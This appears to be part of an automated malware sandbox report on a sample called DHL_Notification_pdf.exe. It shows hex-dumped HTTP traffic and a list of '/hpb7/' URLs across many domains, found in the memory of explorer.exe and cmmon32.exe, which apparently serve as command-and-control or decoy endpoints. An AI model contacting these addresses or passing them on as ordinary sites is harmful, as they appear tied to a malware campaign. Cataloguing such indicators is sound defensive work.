77 38 99 8d 66 57 97 e3 51 77 40 d0 bd e1 f8 24 de b7 ff 56 96 dd af 77 84 ca de 32 af f2 3f ca 1f 8a 43 f6 85 fd e9 df fd 77 b3 9f 7f 75 43 80 57 a7 1d 23 38 a3 8d bc be 78 54 20 bd fd e9 78 f7 3a 3f dc 9e b6 a4 1b c7 8b 9b 27 02 cd 80 3e fb fa f8 59 27 db 15 f7 d9 ef e7 55 f1 fa e2 e2 e6 df 52 45 a4 d7 ab f5 2d 29 fe 4c a7 f4 33 02 64 d2 da 94 07 7f d0 1d fd c5 97 3f fd f2 c7 7f fe e3 3f 1e fd 36 73 00 d2 a9 f7 1f 08 0e ef 6c f7 b8 ae 8a 2e 11 c8 f5 6a bd c8 0d 01 fa f3 9f 9d fe 68 f5 e3 5d ff 63 fe f5 f6 27 df fc f8 f7 27 7f f6 70 f9 fd ef 7f e8 7f bd fb a3 cb 6f de f7 7f 5a fe e0 47 c7 1f 5c 5d ee be 5c 1d 5f bc 79 fb 3b 9b f5 ee 7d 76 28 36 5f bc d8 1f 0a 82 64 47 24 32 5b ee 8e dd 3d 95 e4 6a 71 f7 22 bb 23 7f 7d f1 c2 cd ed 17 0d b1 74 09 8a cd 43 b5 5e 1c d3 b1 e4 5f e7 1f 05 9a 7c bf 6e 80 60 b1 dc 7d 4d aa 6d ca d3 72 b5 c9 0f 45 3a 86 3d e9 7f be 1c 0a 2a 88 70 2e c5 60 a4 a3 12 1d 59 1e 7b b7 bd 65 79 9a 6f 8a c5 66 bd 78 df db 15 55 1a a2 6a bf 38 07 3d f9 b2 1d 19 6c 8c 8f 15 69 7d d1 60 64 8e 85 e8 43 7a dd 15 99 05 c7 e6 4d 8b ea 6d c4 6a 7b ec fd e2 94 13 34 c5 e1 43 83 0e 1c 8b c5 89 08 23 d9 33 3e 90 85 a5 c1 f4 22 72 dd 83 63 5f dd af b7 b7 cd d0 7c 7d 5c 16 9b f5 87 43 fa f8 af b7 64 6e 1c bb ab a2 77 3c 6e ba e2 57 be cd bf 69 22 8c a4 c2 9e 2c 39 b4 33 4d 51 6c 7b db 62 b9 ce 1b 93 b0 ee 6d cb e3 dd 7a 5b 36 98 4a db 4d ef 43 be 39 11 b0 ed b6 38 2c 1a c8 c4 32 df 2c ce 80 63 1e c6 b1 29 f3 e5 0b b2 d1 52 0d 65 47 54 26 aa 7e f1 bf df dc 97 ab 95
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:29:47 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:29:50 GMTServer: ApacheContent-Length: 3242Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 70 61 72 74 69 63 6c 65 27 3e 34 3c 2f 73 70 61 6e 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:29:57 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:29:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 735_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 20 Mar 2023 10:30:05 GMTserver: LiteSpeedData Raw: 35 32 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 7f 77 db 36 b2 e8 df f2 39 fd 0e 08 fd 36 b6 12 92 22 a9 1f 96 65 cb bd 6d da ee f6 bc 76 d3 d3 b4 77 df de 24 cf 07 22 21 89 09 45 f2 92 94 65 d7 f5 77 7f 67 06 00 09 52 94 44 c9 4e 6f f7 6d f6 de cd 5a 20 30 33 18 0c 66 06 83 01 70 f9 ec 9b d7 af 7e f9 e7 4f df 92 79 b6 08 ae be 38 ba 84 ff 25 9e 9f 8c b5 20 4b 34 12 d0 70 36 d6 58 68 fc fa 46 3b 6a c5 09 9b fa b7 63 2d 9a 8d c8 3c cb e2 74 d4 e9 44 b3 d8 5c b0 4e 98 1e 6b 04 01 30 ea c1 ff 2e 58 46 89 3b a7 49 ca b2 b1 f6 eb 2f df 19 43 2d 2f 0f e9 82 8d b5 1b 9f ad e2 28 c9 34 e2 46 61 c6 c2 6c ac ad 7c 2f 9b 8f 3d 76 e3 bb cc c0 1f 3a f1 43 3f f3 69 60 a4 2e 0d d8 d8 46 28 81 1f 7e 24 09 0b c6 5a 9c 44 53 3f 60 1a 99 27 6c 3a d6 24 59 b3 45 3c 33 a3 64 d6 b9 9d 86 1d 1b 1b 7d 71 74 99 f9 59 c0 ae 7e a2 33 46 c2 28 23 d3 68 19 7a e4 f9 f1 d0 b1 ed 0b f2 b3 3f 0d 18 f9 39 8a a6 2c 49 2f 3b bc ee d1 51 ab 75 f9 cc 30 c8 57 41 40 fc 90 bc 0e 19 79 f3 ed 6b d2 33 1d f3 9c 18 84 fa 51 ca 22 d3 8d 16 c4 30 ae a0 32 76 9c 77 30 89 26 51 96 2a dd 0b 23 3f f4 d8 ad 46 3a d5 aa 33 16 b2 84 66 51 a2 d4 ae a0 3c fd ea fb d7 6f be 7d dd 16 b8 25 90 d4 4d fc 38 23 d9 5d cc c6 1a 8d e3 c0 77 69 e6 47 61 27 f0 5e 7e 48 a3 50 23 6e 40 d3 74 ac 71 52 8d d4 9d b3 05 d5 80 80 d6 bd f6 1f c8 fa db 4c 1b 09 d6 bd eb bc eb f0 2a c0 3e 4d d7 fe 63 96 d0 78 ae 8d de de 6b ff 01 48 b4 91 f6 75 c2 a8 e7 26 cb c5 e4 07 3f cd a0 8e ef 95 00 24 c0 ca 84 73 12 78 f3 ae 33 8f 27 67 ef 3a c7 93 bc 65 c0 5b fa 19 5b 00 90 6f 03 b6 60 61 56 42 03 e5 df 67 6c d1 08 c1 31 00 14 b5 e3 28 f5 81 05 da c8 d6 35 c0 a0 8d 0a e2 ff c1 26 20 00 8d 80 6a ba 06 23 a9 8d b4 bf 45 0b 68 e2 31 ce 6e 04 ae fd 10 45 1f fd 70 46 a6 51 42 28 09 d9 8a 40 9f 75 fc 97 24 2c a6 7e a2 13 fc 06 e5 24 61 8b c8 63 c1 97 e4 1f ec e4 86 91 59 94 91 bb 68 49 dc e8 86 25 cc 33 c9 ab 68 b1 60 89 eb d3 00 1a 25 2c f5 3d 16 82 e8 93 94 25 30 23 4c f2 4b 14 93 ff 5e d2 c0 cf ee 10 0b 60 a7 19 a1 21 a1 d3 69 94 78 74 12 30 12 27 be cb 9e 69 ba b6 4c 82 1d c3 a2 3d e8 5a c8 6e 39 e3 54 11 d8 38 82 39 9b 1f f4 82 a7 7b 8d 94 10 85 1c 90 ae 15 e3 e5 3c 6e bc 38 e8 62 d4 fe 1e 65 e4 3b 98 e4 8d 98 21 5a 3f e8 5a 9c b0 1b 3f 5a a6 28 4f db d9 52 c8 dd c3 7b 95 25 af 93 19 0d fd df 70 2a 36 92 b5 e3 a8 dc 42 08 5e 49 2b 35 ea 86 a6 6b 41 34 8b 54 99 ff 7e 41 67 ec f5 e4 03 73 61 b6 ee 16 8b 55 6c 08 95 fc ae b3 8c 83 88 7a e9 bb 8e 63 39 dd 77 1d cb 7e d7 01 f0 46 18 19 13 ea 7e 9c 25 c0 5f 33 0e 51 57 ec d4 03 a5 5e fe 00 64 ea 5c e9 6b 23 db Data Ascii: 5253
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:30:13 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:30:16 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: explorer.exe, 00000004.00000002.523730403.0000000014FCA000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.510648252.00000000056BA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://kunimi.org/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsC
          Source: DHL_Notification_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.523730403.00000000157A4000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.510648252.0000000005E94000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://rifleroofers.com/hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.0dhy.xyz
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.0dhy.xyz/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.admet01.club
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.admet01.club/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.admet01.clubReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.com/hpb7/j
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adoptiveimmunotech.comReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfd
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfd/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfdReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/hpb7/:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.comReferer:
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bohndigitaltech.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bohndigitaltech.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bohndigitaltech.com/hpb7/Xz.
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bohndigitaltech.comReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.comReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.com/hpb7/:
